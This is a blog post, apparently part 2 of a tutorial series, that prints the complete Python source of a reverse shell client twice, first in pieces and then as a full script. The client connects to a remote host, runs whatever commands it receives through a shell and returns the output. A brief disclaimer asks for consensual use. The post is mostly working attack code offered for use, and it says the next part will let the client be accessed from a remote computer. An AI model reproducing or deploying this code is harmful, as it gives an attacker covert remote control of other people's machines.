Reverse Shell in Python - Part 2
Today we'll continue the second part of the Reverse Shell - the client script. Let's start.
DISCLAIMER: I DON'T PROMOTE THE USE OF THIS CODE IN A MALICIOUS WAY. HACKING DONE MUST BE DONE LEGALLY WITH CONSENT.
Code
Let's import the libraries. Here the os library is used to facilitate the cd command from the server to the client. The subprocess library is used to execute terminal commands from the shell.
import socket
import os
import subprocess
import sysNow create the client socket and connect to the specified host and port.
target_host = sys.argv[1]
target_port = int(sys.argv[2])
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client.connect((target_host,target_port))Now write the chunks function to send data by dividing it into chunks.
def chunks(lst, n):
for i in range(0, len(lst), n):
yield lst[i:i+n]
CHUNK_SIZE = 1024Add a while loop that receives commands from the server and sends the responses. When the cd command is received the director is traversed using os.chdir. On top of that, the commands received are run using the subprocess module, and the output along with the directory is given.
while True:
data = ""
d = client.recv(CHUNK_SIZE)
while True:
if "<EOF>" in d.decode("utf-8"):
data+=d.decode("utf-8")[:-5]
break
data+=d.decode("utf-8")
d = client.recv(CHUNK_SIZE)
data = str.encode(data)
if data[:2].decode("utf-8") == 'cd':
try:
os.chdir(data[3:].decode("utf-8"))
except:
client.send(str.encode("Exception occured\n" + str(os.getcwd()) + '$'))
client.send(str.encode("<EOF>"))
if len(data) > 0:
try:
cmd = subprocess.Popen(data[:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE )
output_bytes = cmd.stdout.read()
output_str = str(output_bytes, "utf-8")
output = output_str + str(os.getcwd()) + '$ '
for chunk in chunks(output, CHUNK_SIZE):
client.send(str.encode(chunk))
client.send(str.encode("<EOF>"))
except:
client.send(str.encode("Exception occured\n" + str(os.getcwd()) + '$'))
client.send(str.encode("<EOF>"))
client.close()Here's the full code :
import socket
import os
import subprocess
import sys
def chunks(lst, n):
for i in range(0, len(lst), n):
yield lst[i:i+n]
CHUNK_SIZE = 1024
target_host = sys.argv[1]
target_port = int(sys.argv[2])
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client.connect((target_host,target_port))
while True:
data = ""
d = client.recv(CHUNK_SIZE)
while True:
if "<EOF>" in d.decode("utf-8"):
data+=d.decode("utf-8")[:-5]
break
data+=d.decode("utf-8")
d = client.recv(CHUNK_SIZE)
data = str.encode(data)
if data[:2].decode("utf-8") == 'cd':
try:
os.chdir(data[3:].decode("utf-8"))
except:
client.send(str.encode("Exception occured\n" + str(os.getcwd()) + '$'))
client.send(str.encode("<EOF>"))
if len(data) > 0:
try:
cmd = subprocess.Popen(data[:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE )
output_bytes = cmd.stdout.read()
output_str = str(output_bytes, "utf-8")
output = output_str + str(os.getcwd()) + '$ '
for chunk in chunks(output, CHUNK_SIZE):
client.send(str.encode(chunk))
client.send(str.encode("<EOF>"))
except:
client.send(str.encode("Exception occured\n" + str(os.getcwd()) + '$'))
client.send(str.encode("<EOF>"))
client.close()In the next part, we'll host a TCP server online and access the client from a remote computer.
Reverse Shell in Python - Part 1: - https://philosophicalhacker.blogspot.com/2020/07/reverse-shell-in-python-part-1.html
Reverse Shell in Python - Part 3: - https://philosophicalhacker.blogspot.com/2020/07/reverse-shell-in-python-part-3.html
Comments
Post a Comment